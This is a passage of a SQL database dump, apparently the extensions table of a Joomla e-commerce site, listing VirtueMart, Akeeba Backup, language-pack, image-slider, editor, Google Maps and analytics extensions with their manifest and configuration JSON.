specification','plugin','specification','vmcustom',0,1,1,0,'{\"name\":\"plgvm_specification\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004-2019 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"VMCustom - specification; text input plugin for product\",\"group\":\"\",\"filename\":\"specification\"}','','','',0,'0000-00-00 00:00:00',0,0),(10023,0,'VM Custom - Stockable variants','plugin','stockable','vmcustom',0,1,1,0,'false','','','',0,'0000-00-00 00:00:00',0,0),(10024,0,'VM Calculation - Avalara Tax','plugin','avalara','vmcalculation',0,0,1,0,'{\"name\":\"VM - Calculation Avalara Tax\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"Max Milbers\",\"copyright\":\"Copyright (C) 2013 - 2019 iStraxx UG (haftungsbeschr\\u00e4nkt). All rights reserved\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"VM - Calculation Avalara Tax; On demand tax calculation for whole U.S.A.\",\"group\":\"\",\"filename\":\"avalara\"}','','','',0,'0000-00-00 00:00:00',0,0),(10025,0,'VirtueMart Product','plugin','virtuemart','search',0,1,1,0,'{\"name\":\"Search - VirtueMart\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2014 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"PLG_SEARCH_VIRTUEMART_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"virtuemart\"}','','','',0,'0000-00-00 00:00:00',0,0),(10026,0,'mod_vmmenu','module','mod_vmmenu','',1,1,3,0,'{\"name\":\"VirtueMart Administrator Menu\",\"type\":\"module\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004-2013 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"max|at|virtuemart.net\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"MOD_VMMENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_vmmenu\"}','','','',0,'0000-00-00 00:00:00',5,0),(10027,0,'mod_virtuemart_currencies','module','mod_virtuemart_currencies','',0,1,1,0,'{\"name\":\"mod_virtuemart_currencies\",\"type\":\"module\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"MOD_VIRTUEMART_CURRENCIES_DESC\",\"group\":\"\",\"filename\":\"mod_virtuemart_currencies\"}','','','',0,'0000-00-00 00:00:00',5,0),(10028,0,'mod_virtuemart_product','module','mod_virtuemart_product','',0,1,1,0,'{\"name\":\"mod_virtuemart_product\",\"type\":\"module\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"MOD_VIRTUEMART_PRODUCT_DESC\",\"group\":\"\",\"filename\":\"mod_virtuemart_product\"}','','','',0,'0000-00-00 00:00:00',3,0),(10029,0,'mod_virtuemart_search','module','mod_virtuemart_search','',0,1,1,0,'{\"name\":\"mod_virtuemart_search\",\"type\":\"module\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"MOD_VIRTUEMART_SEARCH_DESC\",\"group\":\"\",\"filename\":\"mod_virtuemart_search\"}','','','',0,'0000-00-00 00:00:00',2,0),(10030,0,'mod_virtuemart_manufacturer','module','mod_virtuemart_manufacturer','',0,1,1,0,'{\"name\":\"mod_virtuemart_manufacturer\",\"type\":\"module\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"MOD_VIRTUEMART_MANUFACTURER_DESC\",\"group\":\"\",\"filename\":\"mod_virtuemart_manufacturer\"}','','','',0,'0000-00-00 00:00:00',8,0),(10031,0,'mod_virtuemart_cart','module','mod_virtuemart_cart','',0,1,1,0,'{\"name\":\"mod_virtuemart_cart\",\"type\":\"module\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"MOD_VIRTUEMART_CART_DESC\",\"group\":\"\",\"filename\":\"mod_virtuemart_cart\"}','','','',0,'0000-00-00 00:00:00',0,0),(10032,0,'mod_virtuemart_category','module','mod_virtuemart_category','',0,1,1,0,'{\"name\":\"mod_virtuemart_category\",\"type\":\"module\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"MOD_VIRTUEMART_CATEGORY_DESC\",\"group\":\"\",\"filename\":\"mod_virtuemart_category\"}','','','',0,'0000-00-00 00:00:00',4,0),(10033,10134,'Akeeba','component','com_akeeba','',1,1,0,0,'{\"name\":\"Akeeba\",\"type\":\"component\",\"creationDate\":\"2024-09-23\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"8.4.0\",\"description\":\"Akeeba Backup Core - Full Joomla! site backup solution, Core Edition.\",\"group\":\"\",\"filename\":\"akeeba\"}','{\"updatedb\":null,\"confwiz_upgrade\":1,\"siteurl\":\"http:\\/\\/www.3s-technologies.com.tr\\/\",\"jlibrariesdir\":\"\\/home\\/ledbazaa\\/public_html\\/3s-technologies.com.tr\\/joomla\\/libraries\",\"jversion\":\"1.6\",\"frontend_secret_word\":\"###AES128###zweFGOvevJH5Aa90gefqbUpQU1Ryk9rMClXAGWq5HT0aqeg+HU9V0HOd23ml7LkpP+cHMAtLnrQAonMPKTqbY2fef2SrlJiRbbouldU9dYdhRLdBSlBJVrysvoImyqiqCyst8ECLUZcAAAAA\",\"show_howtorestoremodal\":0}','','',0,'0000-00-00 00:00:00',0,0),(10058,0,'F0F (NEW) DO NOT REMOVE','library','lib_f0f','',0,1,1,0,'{\"legacy\":false,\"name\":\"F0F (NEW) DO NOT REMOVE\",\"type\":\"library\",\"creationDate\":\"2016-03-19\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2014 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.5.4\",\"description\":\"Framework-on-Framework (FOF) newer version - DO NOT REMOVE - The rapid component development framework for Joomla!. This package is the newer version of FOF, not the one shipped with Joomla! as the official Joomla! RAD Layer. The Joomla! RAD Layer has ceased development in March 2014. DO NOT UNINSTALL THIS PACKAGE, IT IS *** N O T *** A DUPLICATE OF THE \'FOF\' PACKAGE. REMOVING EITHER FOF PACKAGE WILL BREAK YOUR SITE.\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10036,10038,'Türkçe (Türkiye)','language','tr-TR','',0,1,0,0,'{\"name\":\"T\\u00fcrk\\u00e7e (T\\u00fcrkiye)\",\"type\":\"language\",\"creationDate\":\"July 2021\",\"author\":\"\\u00dcmit Kenan G\\u00f6n\\u00fcll\\u00fc\",\"copyright\":\"Copyright (C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"umitkenan@yahoo.com\",\"authorUrl\":\"\",\"version\":\"3.9.28.1\",\"description\":\"tr-TR site language\",\"group\":\"\",\"filename\":\"install\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10037,10038,'Türkçe (Türkiye)','language','tr-TR','',1,1,0,0,'{\"name\":\"T\\u00fcrk\\u00e7e (T\\u00fcrkiye)\",\"type\":\"language\",\"creationDate\":\"July 2021\",\"author\":\"\\u00dcmit Kenan G\\u00f6n\\u00fcll\\u00fc\",\"copyright\":\"Copyright (C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"umitkenan@yahoo.com\",\"authorUrl\":\"\",\"version\":\"3.9.28.1\",\"description\":\"tr-TR administrator language\",\"group\":\"\",\"filename\":\"install\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10038,0,'Turkish Language Pack','package','pkg_tr-TR','',0,1,1,0,'{\"name\":\"Turkish Language Pack\",\"type\":\"package\",\"creationDate\":\"July 2021\",\"author\":\"\\u00dcmit Kenan G\\u00f6n\\u00fcll\\u00fc\",\"copyright\":\"Copyright (C) 2005 - 2021 Open Source Matters. T\\u00fcm haklar\\u0131 sakl\\u0131d\\u0131r.\",\"authorEmail\":\"umitkenan@yahoo.com\",\"authorUrl\":\"\",\"version\":\"3.9.28.1\",\"description\":\"\\n\\t\\t\\n\\t\\t<h3>T\\u00fcrk\\u00e7e (tr-TR) Dil Dosyalar\\u0131 Paketi<\\/h3>\\n\\t\\t<br \\/>\\n\\t\\t<strong>Site ve denetim masas\\u0131 dil dosyalar\\u0131n\\u0131 i\\u00e7erir.<\\/strong>\\n\\t\\t<br \\/>\\n\\t\\t<small>G\\u00fcvenli\\u011finiz i\\u00e7in sadece Joomla taraf\\u0131ndan onaylanm\\u0131\\u015f olan \\u00e7eviri dosyalar\\u0131m\\u0131z\\u0131 kullan\\u0131n.<\\/small>\\n\\t\\t\\n\\t\",\"group\":\"\",\"filename\":\"pkg_tr-TR\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10039,10041,'com_djimageslider','component','com_djimageslider','',1,1,0,0,'{\"name\":\"com_djimageslider\",\"type\":\"component\",\"creationDate\":\"2020-01-19\",\"author\":\"DJ-Extensions.com\",\"copyright\":\"Copyright (C) 2017 DJ-Extensions.com, All rights reserved.\",\"authorEmail\":\"contact@dj-extensions.com\",\"authorUrl\":\"http:\\/\\/dj-extensions.com\",\"version\":\"4.1.1\",\"description\":\"DJ-ImageSlider component\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10040,10041,'DJ-ImageSlider','module','mod_djimageslider','',0,1,0,0,'{\"name\":\"DJ-ImageSlider\",\"type\":\"module\",\"creationDate\":\"2020-01-19\",\"author\":\"DJ-Extensions.com\",\"copyright\":\"Copyright (C) 2017 DJ-Extensions.com, All rights reserved.\",\"authorEmail\":\"contact@dj-extensions.com\",\"authorUrl\":\"http:\\/\\/dj-extensions.com\",\"version\":\"4.1.1\",\"description\":\"DJ-ImageSlider Module\",\"group\":\"\",\"filename\":\"mod_djimageslider\"}','{\"slider_source\":\"0\",\"slider_type\":\"0\",\"link_image\":\"1\",\"image_folder\":\"images\\/sampledata\\/fruitshop\",\"link\":\"\",\"show_title\":\"1\",\"show_desc\":\"1\",\"show_readmore\":\"0\",\"readmore_text\":\"\",\"link_title\":\"1\",\"link_desc\":\"0\",\"limit_desc\":\"\",\"image_width\":\"240\",\"image_height\":\"180\",\"fit_to\":\"0\",\"visible_images\":\"3\",\"space_between_images\":\"10\",\"max_images\":\"20\",\"sort_by\":\"1\",\"effect\":\"Cubic\",\"autoplay\":\"1\",\"show_buttons\":\"1\",\"show_arrows\":\"1\",\"show_custom_nav\":\"0\",\"desc_width\":\"\",\"desc_bottom\":\"0\",\"desc_horizontal\":\"0\",\"left_arrow\":\"\",\"right_arrow\":\"\",\"play_button\":\"\",\"pause_button\":\"\",\"arrows_top\":\"30\",\"arrows_horizontal\":\"5\",\"effect_type\":\"0\",\"duration\":\"\",\"delay\":\"\",\"preload\":\"800\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10041,0,'DJ-ImageSlider Package','package','pkg_dj-imageslider','',0,1,1,0,'{\"name\":\"DJ-ImageSlider Package\",\"type\":\"package\",\"creationDate\":\"2020-01-19\",\"author\":\"DJ-Extensions.com\",\"copyright\":\"Copyright (C) 2017 DJ-Extensions.com, All rights reserved.\",\"authorEmail\":\"contact@dj-extensions.com\",\"authorUrl\":\"http:\\/\\/dj-extensions.com\",\"version\":\"4.1.1\",\"description\":\"\\n\\t\\t<style type=\\\"text\\/css\\\">\\n\\t\\t\\t.djex-info { padding: 20px 30px 10px; margin: 0 0 20px 0; background: #ac00d4; color: #fff; border: 1px solid #81009f; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-weight: normal; -webkit-border-radius: 4px; border-radius: 4px; }\\n\\t\\t\\t.djex-title { text-transform: uppercase; font-weight: bold; font-size: 14px; }\\n\\t\\t\\t.djex-info a:link, .djex-info a:visited, .djex-info a:hover { color:#fff; text-decoration:underline; font-weight: 600; }\\t\\n\\t\\t\\t.djex-info img { float: left; margin: 0 30px 10px 0; }\\n\\t\\t<\\/style>\\n\\t\\t<div class=\\\"djex-info\\\">\\n\\t\\t\\t<a href=\\\"index.php?option=com_djimageslider\\\"><img src=\\\"components\\/com_djimageslider\\/assets\\/ex_slider.png\\\" \\/><\\/a>\\n\\t\\t\\t<p class=\\\"djex-title\\\">Thank you for installing DJ-ImageSlider!<\\/p>\\n\\t\\t\\t<p>The DJ-ImageSlider extension allows you to display slideshows containing slides with title and short description linked to any menu item, article or custom url address. \\n\\t\\t\\tIf you want to learn how to use DJ-ImageSlider please read <a target=\\\"_blank\\\" href=\\\"http:\\/\\/dj-extensions.com\\/documentation\\\">Documentation<\\/a> and <a target=\\\"_blank\\\" href=\\\"http:\\/\\/dj-extensions.com\\/faq\\\">FAQ section<\\/a><\\/p>\\n\\t\\t\\t<p>Check out our other extensions at <a target=\\\"_blank\\\" href=\\\"http:\\/\\/dj-extensions.com\\\">DJ-Extensions.com<\\/a><\\/p>\\n\\t\\t\\t<div style=\\\"clear:both\\\"><\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\",\"group\":\"\",\"filename\":\"pkg_dj-imageslider\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10042,10154,'plg_editors_jce','plugin','jce','editors',0,1,1,0,'{\"name\":\"plg_editors_jce\",\"type\":\"plugin\",\"creationDate\":\"27-04-2021\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2021 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.6\",\"description\":\"WF_EDITOR_PLUGIN_DESC\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10044,10154,'COM_JCE','component','com_jce','',1,1,0,0,'{\"name\":\"COM_JCE\",\"type\":\"component\",\"creationDate\":\"27-04-2021\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2021 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"www.joomlacontenteditor.net\",\"version\":\"2.9.6\",\"description\":\"COM_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10045,0,'DJ-VMPagebreak Content Plugin','plugin','djvmpagebreak','content',0,1,1,0,'{\"name\":\"DJ-VMPagebreak Content Plugin\",\"type\":\"plugin\",\"creationDate\":\"February 2012\",\"author\":\"Blue Constant Media LTD\",\"copyright\":\"Copyright (C) 2010 Blue Constant Media LTD, All rights reserved.\",\"authorEmail\":\"contact@design-joomla.eu\",\"authorUrl\":\"http:\\/\\/design-joomla.eu\",\"version\":\"1.8\",\"description\":\"PLG_CONTENT_DJVMPAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"djvmpagebreak\"}','{\"style\":\"tabs\",\"include_css\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10046,0,'DJ-VMPagebreak Editor Plugin','plugin','djvmpagebreak','editors-xtd',0,1,1,0,'{\"name\":\"DJ-VMPagebreak Editor Plugin\",\"type\":\"plugin\",\"creationDate\":\"February 2012\",\"author\":\"Blue Constant Media LTD\",\"copyright\":\"Copyright (C) 2010 Blue Constant Media LTD, All rights reserved.\",\"authorEmail\":\"contact@design-joomla.eu\",\"authorUrl\":\"http:\\/\\/design-joomla.eu\",\"version\":\"1.3\",\"description\":\"PLG_EDITORSXTD_DJVMPAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"djvmpagebreak\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10047,0,'System - Google Maps','plugin','plugin_googlemap3','system',0,0,1,0,'{\"legacy\":false,\"name\":\"System - Google Maps\",\"type\":\"plugin\",\"creationDate\":\"July 2013\",\"author\":\"Mike Reumer\",\"copyright\":\"(C) 2013 Reumer\",\"authorEmail\":\"tech@reumer.net\",\"authorUrl\":\"tech.reumer.net\",\"version\":\"3.2\",\"description\":\"PLUGIN_GOOGLE_MAP3_INSTALLATION\",\"group\":\"\"}','{\"publ\":\"1\",\"debug\":\"0\",\"plugincode\":\"mosmap\",\"brackets\":\"{\",\"Google_API_version\":\"3\",\"visualrefresh\":\"0\",\"show\":\"1\",\"mapclass\":\"\",\"mapcss\":\"\\/* For img in the map remove borders, shadow, no margin and no max-width\\r\\n*\\/\\r\\n.map img, .svPanel img {\\r\\n    border: 0px;\\r\\n    box-shadow: none;\\r\\n    margin: 0px !important;\\r\\n    padding: 0px !important;\\r\\n    max-width: none !important;\\r\\n    background: none !important;\\r\\n}\\r\\n\\r\\n\\/* Make sure the directions are below the map\\r\\n*\\/\\r\\n.directions {\\r\\n    clear: left;\\r\\n}\\r\\n\\r\\n.adp-directions {\\r\\n    width: 100%;\\r\\n}\\r\\n\\r\\n\\/* Solve problems in chrome with the show of the direction steps in full width\\r\\n*\\/\\r\\n.adp-placemark {\\r\\n    width : 100%;\\r\\n}\\r\\n\\r\\n\\/* Padding for image overlay\\r\\n*\\/\\r\\n.controlDiv {\\r\\n    padding : 5px;\\r\\n}\\r\\n\",\"loadmootools\":\"1\",\"timeinterval\":\"500\",\"Google_API_key\":\"\",\"Google_Multi_API_key\":\"\",\"urlsetting\":\"http_host\",\"googlewebsite\":\"maps.google.com\",\"styledmap\":\"\",\"align\":\"center\",\"langtype\":\"site\",\"lang\":\"\",\"width\":\"500\",\"height\":\"400\",\"effect\":\"none\",\"lat\":\"41.0200362\",\"lon\":\"28.907812\",\"centerlat\":\"\",\"centerlon\":\"\",\"address\":\"\",\"latitudeid\":\"\",\"latitudedesc\":\"1\",\"latitudecoord\":\"0\",\"latitudeform\":\"0\",\"controltype\":\"UI\",\"zoomType\":\"3D-large\",\"svcontrol\":\"1\",\"returncontrol\":\"1\",\"zoom\":\"0\",\"corzoom\":\"0\",\"minzoom\":\"0\",\"maxzoom\":\"19\",\"rotation\":\"1\",\"zoomnew\":\"0\",\"zoomWheel\":\"0\",\"keyboard\":\"0\",\"mapType\":\"Normal\",\"showmaptype\":\"1\",\"showNormalMaptype\":\"1\",\"showSatelliteMaptype\":\"1\",\"showHybridMaptype\":\"1\",\"showTerrainMaptype\":\"1\",\"showEarthMaptype\":\"1\",\"showscale\":\"0\",\"overview\":\"0\",\"dragging\":\"1\",\"marker\":\"1\",\"icon\":\"\",\"iconwidth\":\"\",\"iconheight\":\"\",\"iconanchorx\":\"\",\"iconanchory\":\"\",\"iconshadow\":\"\",\"iconshadowwidth\":\"\",\"iconshadowheight\":\"\",\"iconimagemap\":\"\",\"traffic\":\"0\",\"transit\":\"0\",\"bicycle\":\"0\",\"panoramio\":\"0\",\"panominzoom\":\"none\",\"panomaxzoom\":\"none\",\"pano_userid\":\"\",\"pano_tag\":\"\",\"weather\":\"0\",\"weathercloud\":\"0\",\"weatherinfo\":\"1\",\"weathertempunit\":\"celsius\",\"weatherwindunit\":\"km\",\"dir\":\"0\",\"dirtype\":\"D\",\"formdirtype\":\"1\",\"avoidhighways\":\"0\",\"avoidtoll\":\"0\",\"diroptimize\":\"0\",\"diralternatives\":\"0\",\"showdir\":\"1\",\"animdir\":\"0\",\"animspeed\":\"1\",\"animautostart\":\"0\",\"animunit\":\"kilometers\",\"formspeed\":\"0\",\"formaddress\":\"0\",\"formdir\":\"0\",\"autocompl\":\"both\",\"langanim\":\"en;The requested panorama could not be displayed|Could not generate a route for the current start and end addresses|Street View coverage is not available for this route|You have reached your destination|miles|miles|ft|kilometers|kilometer|meters|In|You will reach your destination|Stop|Drive|Press Drive to follow your route|Route|Speed|Fast|Medium|Slow\",\"txtdir\":\"Directions: \",\"txtgetdir\":\"Get Directions\",\"txtfrom\":\"From here\",\"txtto\":\"To here\",\"txtdiraddr\":\"Address: \",\"txt_driving\":\"\",\"txt_avhighways\":\"\",\"txt_avtoll\":\"\",\"txt_walking\":\"\",\"txt_bicycle\":\"\",\"txt_transit\":\"\",\"txt_optimize\":\"\",\"txt_alternatives\":\"\",\"inputsize\":\"25\",\"dirdefault\":\"0\",\"gotoaddr\":\"0\",\"gotoaddrzoom\":\"0\",\"txtaddr\":\"Address: ##\",\"erraddr\":\"Address ## not found!\",\"txtgotoaddr\":\"Goto\",\"clientgeotype\":\"google\",\"lightbox\":\"0\",\"txtlightbox\":\"Open lightbox\",\"lbxcaption\":\"\",\"lbxwidth\":\"500\",\"lbxheight\":\"700\",\"lbxcenterlat\":\"\",\"lbxcenterlon\":\"\",\"lbxzoom\":\"\",\"sv\":\"none\",\"svpano\":\"\",\"svwidth\":\"100%\",\"svheight\":\"300\",\"svyaw\":\"0\",\"svpitch\":\"0\",\"svzoom\":\"\",\"svautorotate\":\"0\",\"svaddress\":\"1\",\"earthtimeout\":\"300\",\"earthborders\":\"1\",\"earthbuildings\":\"0\",\"earthroads\":\"0\",\"earthterrain\":\"0\",\"kmlrenderer\":\"google\",\"kmlsidebar\":\"none\",\"kmlsbwidth\":\"200\",\"kmlfoldersopen\":\"0\",\"kmlhide\":\"0\",\"kmlscale\":\"0\",\"kmlopenmethod\":\"click\",\"kmlsbsort\":\"none\",\"kmllightbox\":\"0\",\"kmlmessshow\":\"0\",\"kmlclickablemarkers\":\"1\",\"kmlzoommarkers\":\"0\",\"kmlopendivmarkers\":\"\",\"kmlcontentlinkmarkers\":\"0\",\"kmllinkablemarkers\":\"0\",\"kmllinktarget\":\"_self\",\"kmllinkmethod\":\"dblclick\",\"kmlhighlite\":\"{ \'color\': \'#aaffff\', \'opacity\': 0.3,  \'textcolor\': \'#000000\' }\",\"kmlmarkerlabel\":\"100\",\"kmlmarkerlabelclass\":\"\",\"kmlpolylabel\":\"100\",\"kmlpolylabelclass\":\"\",\"proxy\":\"0\",\"txtsrchnrby\":\"Search nearby\",\"txtzoomhere\":\"Zoom Here\",\"txtaddrstart\":\"Start address:\",\"txtkmlgetdir\":\"Go\",\"txtback\":\"\\u00ab Back\",\"txtsearchnearby\":\"Search nearby: e.g. pizza\",\"txtsearch\":\"Go\",\"maxcluster\":\"\",\"clustericonurl\":\"\\/media\\/plugin_googlemap3\\/site\\/geoxmlv3\\/images\\/m\",\"gridsize\":\"\",\"minmarkerscluster\":\"\",\"maxlinesinfocluster\":\"\",\"clusterinfowindow\":\"click\",\"clusterzoom\":\"dblclick\",\"clustermarkerzoom\":\"16\",\"txtzoomin\":\"Zoom in to show more\",\"txtclustercount1\":\"...and\",\"txtclustercount2\":\"more\",\"tilelayer\":\"\",\"tilemethod\":\"\",\"tileopacity\":\"1\",\"tilebounds\":\"\",\"tileminzoom\":\"0\",\"tilemaxzoom\":\"19\",\"imageurl\":\"\",\"imageposition\":\"RIGHT_TOP\",\"imageindex\":\"1\",\"imagewidth\":\"\",\"imageheight\":\"\",\"twittername\":\"\",\"twittertweets\":\"15\",\"twittericon\":\"\\/media\\/plugin_googlemap3\\/site\\/Twitter\\/twitter_map_icon.png\",\"twitterline\":\"#ff0000ff\",\"twitterlinewidth\":\"4\",\"twitterstartloc\":\"0,0,0\",\"twitterconsumerkey\":\"\",\"twitterconsumersecret\":\"\",\"twitteraccesstoken\":\"\",\"twitteraccesstokensecret\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10049,0,'VirtueMart_Plugins_Language_Pack - tr-TR','file','VirtueMart_Plugins_Language_Pack-tr-TR','',0,1,0,0,'{\"legacy\":false,\"name\":\"VirtueMart_Plugins_Language_Pack - tr-TR\",\"type\":\"file\",\"creationDate\":\"30.07.2014\",\"author\":\"VirtueMart language team\",\"copyright\":\"\\u00a9 2008-2014 - compojoom-com. All rights reserved!\",\"authorEmail\":\"max@virtuemart.net\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"2014-07-30-07-24-07\",\"description\":\"\\n        This package was auto generated with CTransifex(https:\\/\\/compojoom.com). We\'ve grabbed the latest language files for our extension from transifex.com.\\n        Special thanks to our translation team at (https:\\/\\/www.transifex.com\\/projects\\/p\\/virtuemart\\/) for helping with this VirtueMart translation!\\n    \",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10050,0,'com_virtuemart - tr-TR','file','com_virtuemart-tr-TR','',0,1,0,0,'{\"name\":\"com_virtuemart - tr-TR\",\"type\":\"file\",\"creationDate\":\"04.08.2019\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004-2018 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"max|at|virtuemart.net\",\"authorUrl\":\"https:\\/\\/www.virtuemart.net\",\"version\":\"2019-08-04-02-39-13\",\"description\":\"\\n        This package was auto generated with CTransifex(https:\\/\\/compojoom.com). We\'ve grabbed the latest language files for our extension from transifex.com.\\n        Special thanks to our translation teams at (https:\\/\\/www.transifex.com\\/virtuemart\\/virtuemart\\/) and (https:\\/\\/www.transifex.com\\/virtuemart\\/virtuemartplugins\\/) for helping with this VirtueMart translation!\\n    \",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10051,0,'epos','plugin','epos','vmpayment',0,0,1,0,'','','','',0,'0000-00-00 00:00:00',20,0),(10052,0,'VM Payment - Realex HPP & API','plugin','realex_hpp_api','vmpayment',0,0,1,0,'{\"name\":\"realex_hpp_api\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2019 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"Global Payments HPP and API\",\"group\":\"\",\"filename\":\"realex_hpp_api\"}','','','',0,'0000-00-00 00:00:00',9,0),(10053,0,'VM Userfield - Realex HPP & API','plugin','realex_hpp_api','vmuserfield',0,0,1,0,'{\"name\":\"Realex_hpp_api\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"Card storage plugin for Realex\",\"group\":\"\",\"filename\":\"realex_hpp_api\"}','','','',0,'0000-00-00 00:00:00',9,0),(10054,0,'eorisis_google_analytics','plugin','eorisis_google_analytics','system',0,1,1,0,'{\"name\":\"eorisis_google_analytics\",\"type\":\"plugin\",\"creationDate\":\"1 June 2017\",\"author\":\"eorisis.com\",\"copyright\":\"(C) 2011-2017 eorisis. All Rights Reserved.\",\"authorEmail\":\"support@eorisis.com\",\"authorUrl\":\"https:\\/\\/eorisis.com\",\"version\":\"2.0.3\",\"description\":\"PLG_SYSTEM_EORISIS_GOOGLE_ANALYTICS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"eorisis_google_analytics\"}','{\"tracking_version\":1,\"tracking_id\":\"UA-57253116-1\",\"tracking_area\":1,\"force_ssl\":0,\"anonymize_ip\":0,\"advertiser_support\":0,\"enhanced_link_attr\":0,\"enhanced_link_attr_cookie_name\":\"\",\"enhanced_link_attr_duration\":\"\",\"enhanced_link_attr_levels\":\"\",\"domain_fqdn\":1,\"domain_fqdn_custom\":\"\",\"domain\":1,\"domain_custom\":\"\",\"cookie_domain\":0,\"cookie_domain_custom\":\"\",\"cookie_name\":0,\"cookie_name_custom\":\"\",\"cookie_expires\":0,\"cookie_expires_custom\":\"\",\"cookie_path\":0,\"cookie_path_custom\":\"\\/\",\"track_subdomains\":0,\"track_multiple_domains\":0,\"domain_type\":1,\"secondary_domains\":\"\",\"exclude_list_ip\":0,\"exclude_list_ip_txt\":\"\",\"exclude_list_ua\":0,\"exclude_list_ua_txt\":\"\",\"exclude_list_hostname\":0,\"exclude_list_hostname_txt\":\"\",\"exclude_list_referrer\":0,\"exclude_list_referrer_txt\":\"\",\"exclude_filter_pattern\":\"exclude\",\"tracking_code_pos\":\"body_end\",\"code_tags\":1,